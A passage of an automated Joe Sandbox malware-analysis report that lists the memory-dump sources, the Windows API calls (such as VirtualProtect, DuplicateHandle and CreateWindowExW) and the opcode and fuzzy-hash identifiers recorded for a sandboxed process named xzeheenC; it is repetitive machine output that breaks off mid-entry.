                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1411284514-0

                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $Haq$Haq$Haq
                                                                                                                        • API String ID: 0-432640594
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LR]q$LR]q
                                                                                                                        • API String ID: 0-3917262905
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ,aq$,aq
                                                                                                                        • API String ID: 0-2990736959
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PH]q$PH]q
                                                                                                                        • API String ID: 0-1166926398
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq$Haq
                                                                                                                        • API String ID: 0-4016896955
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: PH]q$PH]q
                                                                                                                        • API String ID: 0-1166926398
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8bq$TJbq
                                                                                                                        • API String ID: 0-3440557903
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 8bq$TJbq
                                                                                                                        • API String ID: 0-3440557903
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 20CA9EF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 20CA9EF9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 716092398-0
                                                                                                                        APIs
                                                                                                                        • KiUserExceptionDispatcher.NTDLL ref: 1F6EAAC6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatcherExceptionUser
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 6842923-0
                                                                                                                        • Opcode ID: 3d404b1030b37fe3512dd85577fdb206f760a1d2dde278a03d2428ca0168131b
                                                                                                                        • Instruction ID: 906670e06de89cf8870e3fe01cddb074a016e3ed59762582ff2e8eb5856776fc
                                                                                                                        • Opcode Fuzzy Hash: 3d404b1030b37fe3512dd85577fdb206f760a1d2dde278a03d2428ca0168131b
                                                                                                                        • Instruction Fuzzy Hash: 0451BE770256769FC3406F34A3EC22EBA75FB2F3A3B40AD40E42EC145ADB344049CA21
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20CACFB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: d4219f7c1ec723c1f005fd07d7762bab1afa123c8d3c427c2283570a356707cf
                                                                                                                        • Instruction ID: 7a60f0938e2ac230f6a880586ae9462d810e0d84ac3a70972ea94f8122c26a07
                                                                                                                        • Opcode Fuzzy Hash: d4219f7c1ec723c1f005fd07d7762bab1afa123c8d3c427c2283570a356707cf
                                                                                                                        • Instruction Fuzzy Hash: 274176B9D002599FCF10CFA9D984ADEBBF5BB19310F14906AE918AB310D335A985CF94
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 20CACFB3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: c2348661f2c7b8e9ca007a06a24bbcfa0e1461ca1f1192ed083973bcdf054051
                                                                                                                        • Instruction ID: 0fe523009442ce4d8924201594d58533a4cff44c90d4182a554abf58450c0b58
                                                                                                                        • Opcode Fuzzy Hash: c2348661f2c7b8e9ca007a06a24bbcfa0e1461ca1f1192ed083973bcdf054051
                                                                                                                        • Instruction Fuzzy Hash: 934146B9D002599FCF10CFA9D984ADEBBF5BB09310F14906AE918AB310D335A945CF94
                                                                                                                        APIs
                                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 20CADE51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallProcWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2714655100-0
                                                                                                                        • Opcode ID: d11c0b940e089d1e5bc34e569f80c89bc29752222b46b16faee847d97d366bf5
                                                                                                                        • Instruction ID: 0c3fe088d719e1081084a3f9d48a82d1d4b97b65f4696da5b106e7c80847a85a
                                                                                                                        • Opcode Fuzzy Hash: d11c0b940e089d1e5bc34e569f80c89bc29752222b46b16faee847d97d366bf5
                                                                                                                        • Instruction Fuzzy Hash: 224109B4900205CFCB14CF99C488A9ABBF5FF99310F24C459E519AB361D775A841CBA0
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 1CF0F40C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3467653762.000000001CF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1cf00000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: 61c35788ea6e87438e7fa33dff120d4cfe306a6d79c9e6182ff56b1dffe2e14b
                                                                                                                        • Instruction ID: fd9d8efd28b7126b3a41065622355e790628190bd99806e3a2750eb81f3b4e72
                                                                                                                        • Opcode Fuzzy Hash: 61c35788ea6e87438e7fa33dff120d4cfe306a6d79c9e6182ff56b1dffe2e14b
                                                                                                                        • Instruction Fuzzy Hash: 44319AB8D012489FCF10DFA9D980A9EFBB1FF49310F10942AE819B7210D735A945CF64
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(00000000,?,?,00000000), ref: 20CAE0CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        • Opcode ID: a7d66a7de586164f4a1a7993abf25f3e59a7a09ea369604b1a86b5986f518902
                                                                                                                        • Instruction ID: 2e820aa739b2cd8225c60cec2a8bba67c3e91036e2137543231f2ce8bdb2a861
                                                                                                                        • Opcode Fuzzy Hash: a7d66a7de586164f4a1a7993abf25f3e59a7a09ea369604b1a86b5986f518902
                                                                                                                        • Instruction Fuzzy Hash: C03188B8D042589FCB10CFA9D584A9EFBF5EB49310F24902AE918B7310D375A945CFA4
                                                                                                                        APIs
                                                                                                                        • SetTimer.USER32(00000000,?,?,00000000), ref: 20CAE0CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Timer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2870079774-0
                                                                                                                        • Opcode ID: b5262ebf53e6b2d98742ec11a30dab1d62aa830bb4c7ba061d689fc5511e4892
                                                                                                                        • Instruction ID: 9e5641d4c2e7fba33bdf55c964136259ea4242fcb3d1156b260b3414c80c5b68
                                                                                                                        • Opcode Fuzzy Hash: b5262ebf53e6b2d98742ec11a30dab1d62aa830bb4c7ba061d689fc5511e4892
                                                                                                                        • Instruction Fuzzy Hash: F531A8B9D012589FCF10CFA9E580ADEFBF1AB49310F20901AE868B7350D375A945CFA4
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 20CA9582
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 29978b79de87179c122c57cc0a4b686b989ea68e5a27d93f0dde1db17ca7f5fd
                                                                                                                        • Instruction ID: 354e7d01f513f07931d0e2f938099ca6d96d296e1ac12f278321325b944d0ffd
                                                                                                                        • Opcode Fuzzy Hash: 29978b79de87179c122c57cc0a4b686b989ea68e5a27d93f0dde1db17ca7f5fd
                                                                                                                        • Instruction Fuzzy Hash: 283197B8D002499FCB14CFAAD585ADEFBF5EB49310F14906AE918B7320D774A941CFA4
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(?), ref: 20CA9582
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474381326.0000000020CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20ca0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: dfc659408e951eee2734b4e2814bababcdef6d6149952d376505c6d8ea16d958
                                                                                                                        • Instruction ID: a75e87dbb8211db87d4de971677d3c3c90ca2ccf8352f59e87cef4cf31947233
                                                                                                                        • Opcode Fuzzy Hash: dfc659408e951eee2734b4e2814bababcdef6d6149952d376505c6d8ea16d958
                                                                                                                        • Instruction Fuzzy Hash: 223197B8D002599FCB14CFAAD585ADEFBF1AB49310F14906AE918B7360D334A945CFA4
                                                                                                                        APIs
                                                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 20D9B7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474721924.0000000020D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D90000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20d90000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatchMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2061451462-0
                                                                                                                        • Opcode ID: 2b25c3331b92a71d823f22a0c8e069977b4a0b2fb47b2df6158911035915ba86
                                                                                                                        • Instruction ID: fbcdc8e4ae82f121c20cc8e8c87c9c0c66e5987699cf388ddfaff2815768965f
                                                                                                                        • Opcode Fuzzy Hash: 2b25c3331b92a71d823f22a0c8e069977b4a0b2fb47b2df6158911035915ba86
                                                                                                                        • Instruction Fuzzy Hash: 8231CCB8D01208DFCB10CFA9D580ADEFBF4AB49320F24901AE908B3310D334A941CFA5
                                                                                                                        APIs
                                                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 20D9B7E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474721924.0000000020D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D90000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20d90000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DispatchMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2061451462-0
                                                                                                                        • Opcode ID: 46bdd1dca3d2891a8318ab814a8a9fd2b8d040f1f7d9c69a826e995fb0ca7945
                                                                                                                        • Instruction ID: a97b6f1c50497f7cd475e6876c53dba8b5fbc998a07217e608441e081ac373a8
                                                                                                                        • Opcode Fuzzy Hash: 46bdd1dca3d2891a8318ab814a8a9fd2b8d040f1f7d9c69a826e995fb0ca7945
                                                                                                                        • Instruction Fuzzy Hash: C231B9B8D012589FCB14CFA9D580ADEFBF4AF49320F24906AE908B7310D335A941CFA5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                        • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocString_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 959018026-0
                                                                                                                        • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                        • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                        • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                        • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA
                                                                                                                        APIs
                                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 10892065-0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq
                                                                                                                        • API String ID: 0-725504367
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq
                                                                                                                        • API String ID: 0-725504367
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3467653762.000000001CF00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CF00000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1cf00000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Haq
                                                                                                                        • API String ID: 0-725504367
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fcbce978f7dade223ac1841686f7da0ff818056e4a206a077b420f2d9abfc07a
                                                                                                                        • Instruction ID: 7e71a0ea96aa5d976cd67686ff8ba29c6c5c616f107592d211fb7b26f44d7433
                                                                                                                        • Opcode Fuzzy Hash: fcbce978f7dade223ac1841686f7da0ff818056e4a206a077b420f2d9abfc07a
                                                                                                                        • Instruction Fuzzy Hash: A141C575E01218CFDB68CFAAD9507DEBBF2AF89300F50C0A9C418A7252DB345A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e57a8807f3e2117b8f5eb9f72c50e33aae13a5224f0cb0df0677559b8374aaf5
                                                                                                                        • Instruction ID: 38dff98702c91b82bc90e3be59d7780349caee0bdd04c6cc05d76bd5fa9215d2
                                                                                                                        • Opcode Fuzzy Hash: e57a8807f3e2117b8f5eb9f72c50e33aae13a5224f0cb0df0677559b8374aaf5
                                                                                                                        • Instruction Fuzzy Hash: FE41C275E01218CFDB64CFAAD95079EBBF2BF89300F50C0AAC458A7252DB345A85CF15
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e073e4c27490976fd29b765cbcee2f5bb5be5a8f60a0261bcdc2e0bf74855277
                                                                                                                        • Instruction ID: 53784c28a94aeba6b5aad71edda5bbbb6778b290f9a37e83ce7f8df14202d93f
                                                                                                                        • Opcode Fuzzy Hash: e073e4c27490976fd29b765cbcee2f5bb5be5a8f60a0261bcdc2e0bf74855277
                                                                                                                        • Instruction Fuzzy Hash: 4241D475E012188FDB68CFAAD94079EBBF2AF89300F50C0AAC419A7252DB345A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 24e426bf24f3b4ce3555379605dc45fb631c4b28b89f50a07be5425e6c5e4033
                                                                                                                        • Instruction ID: ab768876028d808fd9694e074d09a4251916fb58f13c59c1c09be10a413208ac
                                                                                                                        • Opcode Fuzzy Hash: 24e426bf24f3b4ce3555379605dc45fb631c4b28b89f50a07be5425e6c5e4033
                                                                                                                        • Instruction Fuzzy Hash: 6641D675E01218CFDB68CFAAC9407DEBBF2BF89300F5080A9C518A7255DB345A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7461bfa445b22e354366cf413e5dbeb127c77057ae9548eafdc3a2a3eb6d1661
                                                                                                                        • Instruction ID: 6fb15ffcecc470859167ba46057d4c8cdeeca5882cffcf976690858f16452661
